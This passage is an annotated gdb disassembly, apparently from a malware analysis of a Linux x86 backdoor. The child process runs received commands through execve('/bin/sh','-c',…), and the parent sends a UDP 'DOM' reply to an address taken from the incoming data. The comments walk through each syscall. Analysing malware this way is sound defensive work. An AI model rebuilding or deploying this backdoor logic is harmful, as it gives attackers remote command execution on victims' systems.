(%esi),%al 0x8048511: mov (%edi),%bl 0x8048513: cmp %bl,%al 0x8048515: jne 0x804852d 0x8048517: inc %esi 0x8048518: inc %edi 0x8048519: dec %ecx 0x804851a: cmp $0x0,%ecx 0x8048520: ja 0x804850f #loop 0x8048522: mov $0x1,%eax 0x8048527: pop %edi 0x8048528: pop %esi 0x8048529: pop %edx 0x804852a: pop %ecx 0x804852b: pop %ebx 0x804852c: ret #returns to 0x80487f2 0x804852d: mov $0x0,%eax 0x8048532: pop %edi 0x8048533: pop %esi 0x8048534: pop %edx 0x8048535: pop %ecx 0x8048536: pop %ebx 0x8048537: ret #return to 0x8048517 (gdb) x/i 0x804882a 0x804882a: mov $0x2,%eax #fork 0x804882f: int $0x80 0x8048831: cmp $0x0,%eax 0x8048836: jne 0x804888c #parent 0x8048838: jmp 0x804883d #child PARENT (gdb) x/i 0x804888c 0x804888c: popa 0x804888d: ret #returns to 0x8048804 (gdb) x/i 0x804888e 0x804888e: mov $0x10,%eax 0x8048893: call 0x8048499 0x8048898: cmp $0x0,%eax #error checking 0x804889d: je 0x8048917 0x804889f: mov %eax,%edx 0x80488a1: movw $0x2,(%edx) 0x80488a6: movw $0x1111,0x2(%edx) 0x80488ac: mov 0x1a(%esi),%eax 0x80488af: mov %eax,0x4(%edx) 0x80488b2: mov %edx,%esi 0x80488b4: mov $0x2,%eax #PF_INET 0x80488b9: mov $0x2,%ebx #SOCK_DGRAM 0x80488be: mov $0x11,%ecx #UDP 0x80488c3: call 0x8048538 0x80488c8: mov %eax,%edi 0x80488ca: cmp $0x0,%eax #error checking for socketcall 0x80488cf: jl 0x8048917 0x80488d1: push $0x10 #to length 0x80488d6: push %esi #buffer read in(sockaddr *to) 0x80488d7: push $0x0 #flags 0x80488dc: push $0x3 #length 0x80488e1: jmp 0x80488e6 #jmp bottom 0x80488e3: pop %eax 0x80488e4: jmp *%eax #jmp 0x80488eb 0x80488e6: call 0x80488e3 0x80488eb: sub $0x122,%eax 0x80488f0: push %eax #"DOM" 0x80488f1: push %edi #fd 0x80488f2: mov %esp,%ecx 0x80488f4: push %ebx 0x80488f5: push %ecx 0x80488f6: mov $0x66,%eax #socketcall 0x80488fb: mov $0xb,%ebx 0x8048900: mov %ecx,%ecx #socketcall(SYS_SENDTO,args); 0x8048902: int $0x80 0x8048904: pop %ecx 0x8048905: pop %ebx 0x8048906: pop %eax 0x8048907: pop %eax 0x8048908: pop %eax 0x8048909: pop %eax 0x804890a: pop %eax 0x804890b: pop %eax 0x804890c: mov $0x6,%eax #close 0x8048911: push %ebx 0x8048912: mov %edi,%ebx 0x8048914: int $0x80 0x8048916: pop %ebx 0x8048917: popa 0x8048918: ret #returns to 0x804880d CHILD (gdb) x/i 0x804883a 0x804883a: pop %eax 0x804883b: jmp *%eax #jmp 0x8048842 0x804883d: call 0x804883a 0x8048842: sub $0x28,%eax 0x8048847: mov %eax,%esi #"xxxxyyyyzzzz" 0x8048849: jmp 0x804884e #jmp bottom 0x804884b: pop %eax 0x804884c: jmp *%eax #jmp 0x8048853 0x804884e: call 0x804884b 0x8048853: sub $0x44,%eax 0x8048858: mov %eax,(%esi) #"/bin/sh" 0x804885a: jmp 0x804885f #jmp bottom 0x804885c: pop %eax 0x804885d: jmp *%eax #0x8048864 0x804885f: call 0x804885c 0x8048864: sub $0x4d,%eax 0x8048869: mov %eax,0x4(%esi) #"-c" 0x804886c: mov %edi,0x8(%esi) #command read in 0x804886f: push %ebx 0x8048870: push %ecx 0x8048871: push %edx 0x8048872: mov $0xb,%eax #execve 0x8048877: mov (%esi),%ebx 0x8048879: mov %esi,%ecx 0x804887b: mov $0x0,%edx 0x8048880: int $0x80 0x8048882: pop %edx 0x8048883: pop %ecx 0x8048884: pop %ebx 0x8048885: mov $0x1,%eax #exit 0x804888a: int $0x80 0x804888c: popa 0x804888d: ret